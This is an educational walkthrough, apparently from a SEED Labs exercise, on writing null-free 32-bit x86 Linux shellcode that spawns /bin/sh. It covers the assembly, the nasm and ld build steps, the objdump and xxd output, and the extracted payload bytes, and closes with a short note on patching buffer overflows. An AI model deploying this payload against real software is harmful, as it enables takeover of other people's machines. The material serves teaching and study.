# Shellcode
## What is Shellcode?
Shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine.
One of the most common uses of shellcode is in exploiting **buffer overflows**, a class of vulnerability found in many applications.
So far, the shellcode used in exploits has been just a string of copied and pasted bytes. Shellcode bytes are actually architecture-specific machine instructions, so shellcode is written in assembly language.
## Writing a shellcode
Let us begin with the following code, which executes a shell program:
```C
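#include <stddef.h>
#include <unistd.h>   /* declares execve() */

int main(void) {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;               /* argv must end with a NULL pointer */
    execve(name[0], name, NULL);  /* replaces this process with /bin/sh */
    return 1;                     /* reached only if execve() fails */
}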
```
A naive approach would be to compile the above code into binary, save it in the input file, and set the targeted return address field to the address of the `main()` function, so that when the vulnerable program returns, it jumps to the entry of the above code.
However, this will not work, because the code contains zero bytes, which cannot appear in shellcode: string-copying functions such as `strcpy()` stop at the first zero byte, so the rest of the payload would never be copied. When we compile the above code into binary, the result contains several zeros:
- The `'\0'` terminator at the end of the `"/bin/sh"` string.
- The null pointer stored in `name[1]`.
- The zero value (`NULL`) passed as the third argument in `execve(name[0], name, NULL);`.
So, our task is to convert the above `C` code into binary code that does not contain any zero bytes.
It is convenient to write the above code in assembly language and then assemble it into binary.
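To make the zero-byte problem concrete, here is a minimal sketch. The helper name `bytes_before_first_zero` is hypothetical, not part of the lab. It reports how many bytes of a payload come before the first zero byte, which is also how many bytes a `strcpy()`-style copy would transfer before stopping.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: number of bytes in payload[0..len) that precede the
 * first zero byte. A strcpy()-style copy stops at that zero byte, so this is
 * the part of the payload that would actually be copied. Returns len when
 * the payload contains no zero byte at all. */
size_t bytes_before_first_zero(const unsigned char *payload, size_t len)
{
    const unsigned char *zero = memchr(payload, 0, len);
    return zero ? (size_t)(zero - payload) : len;
}
```

For the 8-byte string `"/bin/sh"` (7 characters plus the terminator) the helper returns 7: only the terminator is a zero byte, which is why the shellcode has to build that terminator at run time.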
Let us briefly review x86 assembly language:
### **Registers in x86**
Assembly instructions for the x86 processor have one, two, three, or no operands. The operands of an instruction can be numerical values, memory addresses, or processor registers. The x86 processor has several general-purpose registers:

- EAX, AX, AH and AL are called the "Accumulator" registers and can be used for I/O port access, arithmetic, interrupt calls, etc. We will use EAX to select the system call to make.
- EBX, BX, BH and BL are called the "Base" registers and are used as base pointers for memory access. We will use them to hold pointers passed as system call arguments. They are also sometimes used to hold the return value of an interrupt.
- ECX, CX, CH and CL are the "Counter" registers.
- EDX, DX, DH and DL are the "Data" registers and can be used for I/O port access, arithmetic and some interrupt calls.
In addition, other registers can be used as operands, such as ESI, EDI, EBP and ESP (the stack pointer).
### **Instructions**
Below are some x86 instructions:
- `mov a, b`: copy the value of `b` into `a`.
- `int x`: raise software interrupt `x`. For example, on 32-bit Linux, `int 0x80` asks the kernel to make a system call: the system call number is read from EAX and the first arguments from EBX, ECX and EDX.
- `<op> <dst>, <src>`: apply the operation `<op>` to `<dst>` and `<src>` and store the result in `<dst>`. `<op>` can be `add` (addition), `sub` (subtraction), `and` (bitwise AND), `or` (bitwise OR) or `xor` (bitwise XOR).
- `lea <dst>, <src>`: load the effective address of the source operand into the destination operand.
Now, back to our main topic: shellcode. The following shellcode implements the C code above (it can be found in the `mysh.s` file of the [SEEDLAB](https://seedsecuritylabs.org/Labs_20.04/Software/Shellcode/) task):
```
section .text
global _start
_start:
; Store the argument string on stack
xor eax, eax
push eax ; Use 0 to terminate the string
push "//sh" ;
push "/bin"
mov ebx, esp ; Get the string address
; Construct the argument array argv[]
push eax ; argv[1] = 0
push ebx ; argv[0] points to the cmd string
mov ecx, esp ; Get the address of argv[]
; For environment variable
xor edx, edx ; No env variable
; Invoke execve()
xor eax, eax ; eax = 0x00000000
mov al, 0x0b ; eax = 0x0000000b
int 0x80
```
Let us walk through the shellcode above. When the C code runs, it invokes `execve()`, which is system call number 11 on 32-bit Linux:
```
SYNOPSIS
#include <unistd.h>
int execve(const char* filename, char* const argv[], char* const envp[])
- filename: must be either a binary executable, or a script starting with a line of the form "#! interpreter [arg]"
- argv: array of argument strings passed to the new program
- envp: array of strings, of the form key=value, which are passed as environment to the new program.
Note: Both argv and envp must be terminated by null pointer.
```
Let us dive into the details of this code:
**Step 1**: Find the address of the `filename` string (in our case, `'/bin/sh'`). Look at the code:
- `xor eax, eax`: Set `eax` to zero. This is an efficient way to obtain a zero value without having zero bytes in the code.
- `push eax`: Push `eax` onto the stack (this marks the end of the `'/bin/sh'` string).
- Next, we need to push the `'/bin/sh'` string onto the stack. However, each push places 4 bytes on the stack (since this shellcode is 32-bit), and the string is 7 bytes long, so we need to make its length a multiple of 4. We can push `'/bin//sh'` instead of `'/bin/sh'` (in a path, the double slash `//` is treated the same as `/`). Because the stack grows toward lower addresses, we push the second half `'//sh'` first and then `'/bin'`, so that the bytes read `/bin//sh` in memory.
- `mov ebx,esp`: Copy `esp` to `ebx`. Since `esp` always points to the top of the stack, this saves the address of the string in the `ebx` register.
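The two `push` operands can be checked by hand. The sketch below uses a hypothetical helper, `pack_le32`, to pack four characters into the 32-bit value that a little-endian x86 machine stores for them; the results match the immediates `0x68732f2f` and `0x6e69622f` shown by `objdump` later in this section.

```c
#include <stdint.h>

/* Hypothetical helper: pack four characters into the 32-bit value that
 * `push "abcd"` places on the stack of a little-endian machine. The first
 * character becomes the least significant byte, so it lands at the lowest
 * address and the string reads left to right in memory. */
uint32_t pack_le32(const char s[4])
{
    return (uint32_t)(unsigned char)s[0]
         | (uint32_t)(unsigned char)s[1] << 8
         | (uint32_t)(unsigned char)s[2] << 16
         | (uint32_t)(unsigned char)s[3] << 24;
}
```

For example, `pack_le32("//sh")` yields `0x68732f2f` and `pack_le32("/bin")` yields `0x6e69622f`. Neither value contains a zero byte, which is the point of padding the path to 8 characters.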
**Step 2**: Find the address of `argv[]` (in our case, the `name` array in the above C code)
- `push eax`: Push a zero (the last element, `argv[1]`, of the `argv` array), since `eax` still holds zero.
- `push ebx`: Push the address of the string `'/bin//sh'` onto the stack; this becomes `name[0]`. The `argv` array is now constructed on the stack.
- `mov ecx,esp`: Copy `esp` to `ecx`. This saves the address of the `argv` array (the `name` array) in the `ecx` register.
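The stack layout after Steps 1 and 2 can be illustrated with a toy model. This is only a sketch: `toy_stack`, `toy_push` and `replay_steps` are hypothetical names, and array indices stand in for real addresses.

```c
#include <stdint.h>

#define TOY_WORDS 8

/* Toy model of a 32-bit stack that grows toward lower indices.
 * Indices stand in for addresses; this is not real process memory. */
struct toy_stack {
    uint32_t word[TOY_WORDS];
    uint32_t esp;               /* index of the most recently pushed word */
};

static void toy_push(struct toy_stack *s, uint32_t value)
{
    s->word[--s->esp] = value;
}

/* Replay the pushes from Steps 1 and 2 and report the values that the
 * real code would leave in ebx and ecx (as indices, not addresses). */
void replay_steps(struct toy_stack *s, uint32_t *ebx, uint32_t *ecx)
{
    s->esp = TOY_WORDS;         /* empty stack */
    toy_push(s, 0);             /* string terminator */
    toy_push(s, 0x68732f2f);    /* "//sh" */
    toy_push(s, 0x6e69622f);    /* "/bin" */
    *ebx = s->esp;              /* "address" of "/bin//sh" */
    toy_push(s, 0);             /* argv[1] = NULL */
    toy_push(s, *ebx);          /* argv[0] = pointer to the string */
    *ecx = s->esp;              /* "address" of argv[] */
}
```

After the replay, the word at index `ecx` holds `ebx` and the next word holds 0, which is exactly the two-element, NULL-terminated `argv` array that `execve()` expects.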
**Step 3**: Find the address of the `envp[]`
- Since we don't pass any environment variables, we do not need to build an array as we did for `argv[]`. We simply xor `edx` with itself, so that `edx` holds 0, which is a NULL `envp` pointer. Nothing is pushed onto the stack in this step.
**Step 4**: Invoke `execve()` system call
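- `xor eax, eax` followed by `mov al, 0x0b`: Clear `eax`, then set its lowest byte to `0x0b`, since `execve()` is system call number 11. Writing only to `al` avoids the three zero bytes that a 32-bit immediate would put in the machine code.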
- `int 0x80`: execute the system call
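The benefit of writing to `al` can be checked by counting zero bytes in the two encodings. The sketch below uses a hypothetical helper, `count_zero_bytes`. The bytes for `mov eax, 0x0b` follow the standard `B8 imm32` encoding, and the bytes for the `xor`/`mov al` pair are the ones shown in the `objdump` listing later in this section.

```c
#include <stddef.h>

/* Hypothetical helper: count the zero bytes in a machine-code buffer. */
size_t count_zero_bytes(const unsigned char *code, size_t len)
{
    size_t zeros = 0;
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0)
            zeros++;
    }
    return zeros;
}

/* mov eax, 0x0b : opcode B8 followed by a 32-bit little-endian immediate */
const unsigned char mov_eax_imm32[] = { 0xb8, 0x0b, 0x00, 0x00, 0x00 };

/* xor eax, eax ; mov al, 0x0b : the sequence used by the shellcode */
const unsigned char xor_then_mov_al[] = { 0x31, 0xc0, 0xb0, 0x0b };
```

Here `count_zero_bytes(mov_eax_imm32, sizeof mov_eax_imm32)` is 3, while the sequence used by the shellcode contains no zero bytes and is also one byte shorter.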
Now that we understand the shellcode, let's get the binary code from it:
- **Compiling to object code**: We assemble the code above (saved in the `mysh.s` file) using `nasm`, the Netwide Assembler, a portable 80x86 assembler. The `-f elf32` option indicates that we want the output in the 32-bit ELF format.
```
[05/12/22]seed@VM:~/.../Shellcode$ nasm -f elf32 mysh.s -o mysh.o
```
- **Linking to generate the final binary**: Once we have the object code `mysh.o`, we can generate the executable binary by running the linker program `ld`. The `-m elf_i386` option tells the linker to generate a 32-bit ELF binary.
```
[05/13/22]seed@VM:~/.../Shellcode$ ld -m elf_i386 mysh.o -o mysh
[05/13/22]seed@VM:~/.../Shellcode$ mysh
sh-5.0$
```
We now have a shell.
- **Getting the machine code**: We only need the machine code of the shellcode. We can use `objdump` to disassemble the object file and display the machine code next to each instruction:
<pre>
sh-5.0$ objdump -Mintel --disassemble mysh.o
mysh.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: <b>31</b> <b>c0</b> xor eax,eax
2: <b>50</b> push eax
3: <b>68</b> <b>2f</b> <b>2f</b> <b>73</b> <b>68</b> push 0x68732f2f
8: <b>68</b> <b>2f</b> <b>62</b> <b>69</b> <b>6e</b> push 0x6e69622f
d: <b>89</b> <b>e3</b> mov ebx,esp
f: <b>50</b> push eax
10: <b>53</b> push ebx
11: <b>89</b> <b>e1</b> mov ecx,esp
13: <b>31</b> <b>d2</b> xor edx,edx
15: <b>31</b> <b>c0</b> xor eax,eax
17: <b>b0</b> <b>0b</b> mov al,0xb
19: <b>cd</b> <b>80</b> int 0x80
</pre>
In the above printout, the highlighted numbers are the machine code. We can also use the `xxd` command to print the content of the object file, where the same bytes appear (highlighted):
<pre>
sh-5.0$ xxd -p -c 20 mysh.o
7f454c460101010000000000000000000100030001000000000000000000000040000000000000003400000000002800050002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010000000600000000000000100100001b00000000000000000000001000000000000000070000000300000000000000000000003001000021000000000000000000000001000000000000001100000002000000000000000000000060010000400000000400000003000000040000001000000019000000030000000000000000000000a00100000f000000000000000000000001000000000000000000000000000000<b>31c050682f2f7368682f62696e89e3505389e131d231c0b00bcd80</b>0000000000002e74657874002e7368737472746162002e73796d746162002e73747274616200000000000000000000000000000000000000000000000000000000000000000100000000000000000000000400f1ff0000000000000000000000000300010008000000000000000000000010000100006d7973682e73005f73746172740000
</pre>
The extracted shellcode is:
```
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80"
```
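Turning the highlighted hex run from `xxd` into the escaped form above is mechanical. The following is a minimal sketch of that conversion; the function name `hex_to_c_escapes` is hypothetical and not part of the lab materials.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: convert a plain hex string such as "31c0" into the
 * text \x31\xc0 (each pair of hex digits gets a \x prefix).
 * Returns 0 on success, or -1 if the input has odd length, contains a
 * non-hex character, or does not fit in `out` (including the terminator). */
int hex_to_c_escapes(const char *hex, char *out, size_t out_size)
{
    size_t n = strlen(hex);
    if (n % 2 != 0 || out_size < 2 * n + 1)
        return -1;
    for (size_t i = 0; i < n; i += 2) {
        if (!isxdigit((unsigned char)hex[i]) ||
            !isxdigit((unsigned char)hex[i + 1]))
            return -1;
        out[2 * i]     = '\\';
        out[2 * i + 1] = 'x';
        out[2 * i + 2] = hex[i];
        out[2 * i + 3] = hex[i + 1];
    }
    out[2 * n] = '\0';
    return 0;
}
```

Given the 54 hex digits highlighted in the `xxd` output, the function produces 27 escaped bytes, the same sequence as in the string above.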
## Countermeasure
Attackers often reverse engineer programs to find their vulnerable spots. As a first step, make sure that known vulnerabilities in the software you use are patched. In addition, eliminating **buffer overflows** in your own code helps keep your organization safe from shellcode injection.
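As one illustration of addressing buffer overflows at the source level, the sketch below checks the input length before copying instead of calling `strcpy()` blindly. The function name `copy_checked` is hypothetical, and this is only one of several possible approaches, not a complete defense.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy `src` into `dst` only if it fits, including the
 * terminating zero byte. Returns 0 on success, or -1 if the input is too
 * long; in that case `dst` is left as an empty string and is never
 * overflowed. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return -1;
    size_t len = strlen(src);
    if (len >= dst_size) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);  /* len + 1 also copies the terminator */
    return 0;
}
```

With an 8-byte buffer, `copy_checked` accepts `"/bin/sh"` (7 characters plus the terminator) and rejects `"/bin//sh"`, which would need 9 bytes.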